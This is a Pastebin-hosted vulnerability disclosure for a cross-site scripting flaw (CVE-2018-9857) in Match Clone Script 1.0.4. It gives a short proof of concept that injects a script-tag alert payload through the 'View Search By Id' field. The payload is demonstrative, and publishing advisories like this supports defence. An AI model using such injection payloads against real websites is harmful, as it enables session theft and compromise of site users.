Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ########################################################################
- # Exploit Title: Match Clone Script 1.0.4 - Cross-Site Scripting
- # Date: 23.02.2018
- # Vendor Homepage: https://www.phpscriptsmall.com/
- # Software Link: https://www.phpscriptsmall.com/product/match-clone/
- # Category: Web Application
- # Exploit Author: ManhNho
- # Version: 1.0.4
- # Tested on: Window 10 / Kali Linux
- # CVE: CVE-2018-9857
- ##########################################################################
- Proof of Concept
- ------------------------
- 1. Access to site
- 2. Choose “Search”
- 3. Choose "View Search By Id"
- 3. Put <script>alert('ManhNho')</script> in search field
- 4. You will be having a popup: ManhNho
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement